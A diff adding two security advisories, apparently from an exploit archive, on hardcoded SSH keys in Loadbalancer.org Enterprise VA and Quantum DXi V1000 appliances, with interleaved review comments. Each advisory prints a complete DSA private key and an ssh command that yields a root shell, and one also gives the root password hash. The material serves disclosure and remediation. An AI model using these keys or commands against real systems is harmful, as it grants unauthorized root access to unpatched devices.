@@ -0,0 +1,125 @@ +----------- +Author: +----------- + +xistence < xistence[at]0x90[.]nl > + +------------------------- +Affected products: +------------------------- + +Loadbalancer.org Enterprise VA 7.5.2 and below + +------------------------- +Affected vendors: +------------------------- + +Loadbalancer.org +http://www.loadbalancer.org/ + +------------------------- +Product description: +------------------------- + +The Loadbalancer.org Virtual Appliance is a revolution in software load +balancing. The software is simple to install on Windows, Mac & Linux and +does not have any adverse effects on the host operating system. + +---------- +Details: +---------- + +[ 0x01 - SSH Private Key ] + +Loadbalancer.org Enterprise VA 7.5.2 contains a default SSH private key: + +[root@lbmaster .ssh]# cat id_dsa +-----BEGIN DSA PRIVATE KEY----- +MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW +Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd +yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ +rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+ +t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW +cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY +TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1 +MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl +2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH +SzmJVCWFyVuuANR2Bnc= +-----END DSA PRIVATE KEY----- + +And a authorized_keys2: + +[root@lbmaster .ssh]# cat authorized_keys2 +ssh-dss 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 +root@lbslave + + +The manual says the following: + +--- +Appliance Security Lockdown Script + +To ensure that the appliance is secure it's recommended that a number of +steps should be carried out. +These steps have been incorporated into a lockdown script which can be run +at the console (recommended) or via a terminal session. 
+The script helps to lock down the following: +- the password for the 'loadbalancer' Web User Interface account +- the password for the Linux 'root' account +- which subnet / host is permitted access to the load balancer + +It also regenerates the SSH keys that are used to secure communicating +between the master and slave appliance. + +To start the script, at the console or via an SSH terminal session run the +following command: +???lbsecure +--- + + +However, the lbsecure script will regenerate the id_dsa/id_dsa.pub, but the +authorized_keys2 will remain untouched. +This makes it still possible to login using the key, without any password! + +Create a file "lb" containing the key: + +$ cat lb +-----BEGIN DSA PRIVATE KEY----- +MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW +Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd +yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ +rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+ +t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW +cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY +TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1 +MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl +2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH +SzmJVCWFyVuuANR2Bnc= +-----END DSA PRIVATE KEY----- + +SSH to the Loadbalancer.org VM using this key: + +$ ssh -i lb root@192.168.2.21 +Last login: Wed Jan 29 09:12:10 2014 from 192.168.2.72 +-bash: warning: setlocale: LC_CTYPE: cannot change locale (UTF-8) +[root@lbmaster ~]# id +uid=0(root) gid=0(root) +groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) +[root@lbmaster ~]# + + + +----------- +Solution: +----------- + +Upgrade to version 7.5.3 or newer + +-------------- +Timeline: +-------------- + +30-01-2014 - Issues discovered and vendor notified +15-01-2014 - Vendor replies, also made patch available. 
+17-03-2014 - Public disclosure
\ No newline at end of file
diff --git a/platforms/unix/remote/32372.txt b/platforms/unix/remote/32372.txt
new file mode 100755
index 000000000..f34a9f40f
--- /dev/null
+++ b/platforms/unix/remote/32372.txt
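Review bot: The timeline is out of order — `30-01-2014 - Issues discovered and vendor notified` is followed by `15-01-2014 - Vendor replies, also made patch available.`, so one of the dates is wrong (likely a month typo); as written the vendor patched before being notified. The remediation is also thinner than the finding warrants: the text itself shows that lbsecure regenerates id_dsa but leaves authorized_keys2 untouched, so an upgrade to 7.5.3 may not revoke the shipped public key on already-deployed appliances, and operators should be told to delete the `root@lbslave` entry from /root/.ssh/authorized_keys2 (and authorized_keys) on both master and slave and re-pair them. Whether 7.5.3 does that automatically is not something the text establishes.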
@@ -0,0 +1,95 @@ +----------- +Author: +----------- + +xistence < xistence[at]0x90[.]nl > + +------------------------- +Affected products: +------------------------- + +Quantum DXi V1000 2.2.1 and below + +------------------------- +Affected vendors: +------------------------- + +Quantum +http://quantum.com/ + +------------------------- +Product description: +------------------------- + +Quantum DXi® V-Series is a virtual deduplication backup appliance that +protects physical and +virtual data across remote sites, the datacenter and cloud deployments. + +---------- +Details: +---------- + +[ 0x01 - Default root user ] + +The root user has a hardcoded password that is unknown and not changeable. +Normally access is only through the restricted shells. + +The /etc/shadow file shows the following hash: +root:$1$FGOgdWM7$dac9P0EJgTSX8a4zc4TXJ/:15783:0:99999:7::: + + +[ 0x02 - Known SSH Private Key ] + + +The /root/.ssh/authorized_keys on the appliance contains the following key +(same with every deployment): + +-----BEGIN DSA PRIVATE KEY----- +MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2 +hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t +Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2 ++o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4 +6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5 +PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr +E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK +6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn +k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u +B3Upsx556K/iZPPnJZE= +-----END DSA PRIVATE KEY----- + +Using the key on a remote system to login through SSH will give a root +shell: + +$ ssh -i quantum.key root@192.168.2.117 +Last login: Mon Sep 23 21:27:19 2013 from 192.168.2.71 + +Product Model = DXiV1000 +Hardware Configuration = V1000 +System Version = 2.2.1_MC +Base OS Version = 
2.2.1_MC-9499 +Application Version = 2.2.1_MC-50278 +SCM Build Version = Build14 +Kernel Version = 2.6.18-164.15.1.qtm.4 + +[root@DXi000C29FB1EA1 ~]# id +uid=0(root) gid=0(root) +groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),103(adic) + + +----------- +Solution: +----------- + +Upgrade to version 2.3.0.1 or newer + +-------------- +Timeline: +-------------- + +30-09-2013 - Issues discovered and vendor notified +30-09-2013 - Reply from vendor asking for more details +01-10-2013 - Supplied more details how to replicate +19-11-2013 - Asked for status update +19-11-2013 - Reply from vendor that an updated release is due for March 2014 +xx-xx-2014 - Quantum DXi V1000 2.3.0.1 released +17-03-2014 - Public disclosure \ No newline at end of file
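Review bot: Section 0x02 says `/root/.ssh/authorized_keys on the appliance contains the following key` and then prints a DSA private key; authorized_keys holds public keys, so the wording is wrong and the text never says where the private half came from (presumably /root/.ssh/id_dsa on the same image). Suggest `The appliance ships a fixed DSA key pair in /root/.ssh on every deployment; the public half is in /root/.ssh/authorized_keys and the private half is:`. Section 0x01's root hash is MD5-crypt (`$1$`) with its salt shown, so "unknown" does not mean unrecoverable offline, and the Solution should state whether 2.3.0.1 actually removes the shipped key from authorized_keys or merely ships a different one — the text does not say.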